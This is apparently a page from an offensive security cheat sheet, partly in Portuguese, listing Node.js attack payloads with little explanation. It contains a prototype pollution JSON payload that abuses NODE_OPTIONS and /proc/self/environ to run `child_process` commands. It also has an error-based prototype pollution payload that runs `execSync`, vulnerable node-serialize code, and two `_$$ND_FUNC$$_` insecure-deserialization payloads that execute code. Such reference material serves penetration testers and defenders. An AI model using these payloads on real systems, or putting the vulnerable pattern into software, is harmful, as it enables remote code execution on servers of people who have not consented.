NodeJS

Prototype Pollution Nodejs

{"name":"nosferatu","constructor":{"prototype":{"env":{"teste":"require('child_process').exec('id').stdout.pipe(process.stdout);//","NODE_OPTIONS":"--require /proc/self/environ"}}},"paper":10}

Prototype Pollution Nodejs Error Based

[(function test(xct){return ''[!nosferatu?'__proto__':'constructor'][xct]})('constructor')('throw new Error(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())')()]

Desserialização Insegura Nodejs

Código vulnerável

var teste = require('node-serialize')
teste.unserialize(data);

Exploit

{"a":"_$$ND_FUNC$$_function(){console.log(\"nosferatu\")}"}
{"a":"_$$ND_FUNC$$_function(){require('child_process').exec('id')}()"}

PreviousREST API NextInsecure File Upload

Last updated 2 years ago